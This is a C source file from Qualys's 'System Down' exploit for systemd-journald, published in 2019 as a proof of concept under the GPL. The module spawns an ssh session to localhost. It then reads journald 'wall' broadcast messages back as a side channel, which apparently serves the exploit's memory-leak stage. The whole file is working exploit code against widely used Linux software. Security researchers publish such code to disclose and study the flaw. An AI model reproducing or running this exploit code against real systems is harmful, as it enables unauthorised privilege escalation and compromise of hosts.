/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#define _GNU_SOURCE
#include <signal.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

#include "journald.h"
#include "macro.h"
#include "wall.h"

static int wall_fd = -1;

static bool
select_wall_fd(void)
{
    if (wall_fd <= -1) die();
    if (wall_fd >= FD_SETSIZE) die();

    fd_set readfds;
    FD_ZERO(&readfds);
    FD_SET(wall_fd, &readfds);
    struct timeval timeout = { .tv_sec = 1 };
    const int nfds = select(wall_fd + 1, &readfds, NULL, NULL, &timeout);
    if (nfds == 0) return false;

    if (nfds != 1) die();
    if (!FD_ISSET(wall_fd, &readfds)) die();
    return true;
}

void
initialize_wall(void)
{
    if (wall_fd != -1) die();
  {
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0, sv)) die();
    const pid_t pid = fork();
    if (pid <= -1) die();
    const int fd = sv[!!pid];
    if (close(sv[!pid])) die();

    if (pid == 0) {
        if (fd <= 2) die();
        if (dup2(fd, 0) != 0) die();
        if (dup2(fd, 1) != 1) die();
        if (dup2(fd, 2) != 2) die();
        if (close(fd)) die();
        #define ECHO "CHRIS CHRIS"
        #define ECHO_LEN (sizeof(ECHO)-1)
        static char * const argv[] = { "ssh", "-q", "-t", "-t", "127.0.0.1", "echo "ECHO" && md5sum", NULL };
        if (prctl(PR_SET_PDEATHSIG, SIGTERM, 0, 0, 0)) die();
        execvp(argv[0], argv);
        die();
    }
    wall_fd = fd;
  }
    static char buf[65536];
    size_t len = 0;
    TIMED_WHILE (true) {
        if (!select_wall_fd()) continue;
        const ssize_t nbr = read(wall_fd, buf + len, sizeof(buf) - len);
        if (nbr <= 0) die();
        if ((size_t)nbr >= sizeof(buf) - len) die();
        len += nbr;
        if (memmem(buf, len, ECHO, ECHO_LEN)) return;
    }
    die();
}

size_t
read_from_wall(const char * const identifier, char * const buf, const size_t size)
{
    if (!buf) die();
    if (size <= 1) die();
    if (!identifier) die();
    const size_t identifier_len = strlen(identifier);
    if (identifier_len <= 0) die();

    size_t len = 0;
    TIMED_WHILE (true) {
        if (!select_wall_fd()) continue;
        const ssize_t nbr = read(wall_fd, buf + len, size - len);
        if (nbr <= 0) die();
        if ((size_t)nbr >= size - len) die();
        len += nbr;

        #define FROM "Broadcast message from systemd-journald@"
        #define FROM_LEN (sizeof(FROM)-1)
        const char * ptr = memmem(buf, len, FROM, FROM_LEN);
        if (!ptr) continue;
        ptr += FROM_LEN;

        #define DATE "):"
        #define DATE_LEN (sizeof(DATE)-1)
        const char * const end = buf + len;
        ptr = memmem(ptr, end - ptr, DATE, DATE_LEN);
        if (!ptr) continue;
        ptr += DATE_LEN;

        for (; ptr < end; ptr++) {
            if (*ptr != '\r' && *ptr != '\n') break;
        }
        if (ptr >= end) continue;
        const char * const msg = ptr;

        for (; ptr < end; ptr++) {
            if (*ptr == '\r' || *ptr == '\n') break;
        }
        if (ptr >= end) continue;
        if (ptr <= msg) die();
        const size_t msg_len = ptr - msg;

        if (!memmem(msg, msg_len, identifier, identifier_len)) {
            memmove(buf, ptr, len = end - ptr);
            continue;
        }
        buf[0] = ' ';
        memmove(buf + 1, msg, msg_len);
        buf[1 + msg_len] = '\n';
        return (1 + msg_len + 1);
    }
    die();
}

bool
use_wall(void)
{
    return (wall_fd != -1);
}

